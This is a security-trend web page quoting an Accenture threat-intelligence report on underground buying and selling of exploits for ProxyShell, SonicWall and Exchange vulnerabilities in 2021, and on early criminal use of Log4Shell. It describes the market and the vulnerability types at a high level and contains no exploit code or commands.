- Home >
- Services >
- Access to Knowledge >
- Trend Monitor >
- Domain of Application >
- Trend snippet: Vulnerability exploits see high volume buying and selling
Trends in Security Information
The HSD Trendmonitor is designed to provide access to relevant content on various subjects in the safety and security domain, to identify relevant developments and to connect knowledge and organisations. The safety and security domain encompasses a vast number of subjects. Four relevant taxonomies (type of threat or opportunity, victim, source of threat and domain of application) have been constructed in order to visualize all of these subjects. The taxonomies and related category descriptions have been carefully composed according to other taxonomies, European and international standards and our own expertise.
In order to identify safety and security related trends, relevant reports and HSD news articles are continuously scanned, analysed and classified by hand according to the four taxonomies. This results in a wide array of observations, which we call ‘Trend Snippets’. Multiple Trend Snippets combined can provide insights into safety and security trends. The size of the circles shows the relative weight of the topic, the filters can be used to further select the most relevant content for you. If you have an addition, question or remark, drop us a line at info@securitydelta.nl.
visible on larger screens only
Please expand your browser window.
Or enjoy this interactive application on your desktop or laptop.
Vulnerability exploits see high volume buying and selling
to successful ransomware operations
Actors are busy selling or buying CVE exploits
Accenture analyzed 45 instances of underground actors wanting to sell or buy exploits for Common Vulnerabilities
and Exposures (CVEs) between August 2021 and October 2021 (Figure 6).
We identified:
• 24 actors buying or selling exploits for 16 CVEs across four forums or marketplaces.
• 16 actors wanting to buy exploits for seven CVEs.
• Nine actors selling exploits for 12 CVEs.
Actors have “top three” vulnerabilities they buy and sell
During the period August – October 2021, the three most popular CVE exploits on the market are for CVE-2021-34473,
CVE-2021-20016 and CVE-2021-31206. Accenture analyzed these vulnerabilities in the context of the potential impact of
successful exploitation and the assessed intentions of the actors seeking to purchase related exploits.
Accenture found that successful exploitation of each of the noted vulnerabilities enables a remote adversary unauthorized access to a victim network and execution of arbitrary code on a victim host. Analysis of past activities of actors who sought to purchase exploits indicates the actors are financially motivated and that it is likely they intend to use the exploits to facilitate unauthorized network access schemes.
Here is further detail on the most popular CVE exploits:
• CVE-2021-34473: Accenture identified two actors selling the same exploit and eight financially motivated actors wanting
to buy an exploit for CVE-2021-34473 in the period of August – October 2021. CVE-2021-34473 (also known as ProxyShell)
is an improper input validation vulnerability (CWE-20) in Microsoft Exchange Server 2013-2019. An actor chaining CVE-2021-
34473 with CVE-2021-34523 and CVE-2021- 31207 could execute arbitrary code with SYSTEM-level privileges on a victim host.
• CVE-2021-20016: Accenture identified four financially motivated actors wanting to buy a CVE-2021-20016 exploit, but did
not identify any actors wanting to sell any. CVE-2021-34473 is a SQL injection vulnerability (CWE-89) in SonicWall SSLVPN
SMA100 that an attacker could exploit to gain access to and modify a victim host’s backend database, facilitating attacker
access to administrator credentials which can be used to remotely execute arbitrary code on a victim’s host.
• CVE-2021-31206: Accenture identified one actor selling and four financially motivated actors wanting to buy a CVE-2021-31206 exploit. CVE-2021- 31206 is a data-processing error vulnerability (CWE-19) in Microsoft Exchange Server 2013-2019 an actor could exploit to enable the execution of arbitrary code on a victim’s host.
Actors begin to capitalize on Log4j vulnerability
On December 9, 2021, Log4j maintainers reported details surrounding a remote code execution vulnerability,22 identified
as both CVE-2021-44228 and Log4Shell, that could allow attackers to execute arbitrary code on a vulnerable host.
Successful exploitation would allow attackers to execute code without authentication. Because exploitation occurs by logging
input, the attack surface for this vulnerability is extremely large. The first reported major exploitation occurred in a popular
online video game. Another observed usage of the vulnerability involved a user changing their phone’s device name and
using that device name to inject code into the phone manufacturer’s cloud service.
In late December 2021 there were first reports of a worm leveraging Log4j in the wild, more evidence of threat actors’ interest in exploiting Log4j, and a new Log4j attack vector via WebSockets. CISA estimates there are 100 million affected software and technology instances across a wide range of technology products and vendors.”
In December 2021, Accenture identified underground actors capitalizing on the news of the Log4j vulnerability. Threat actors began identifying ways to incorporate the vulnerability into attacking vulnerable companies and leveraging the access in botnet operations. In January 2022, actors began to research networks and IP addresses vulnerable to the Log4shell weakness and started selling their analysis to fellow underground actors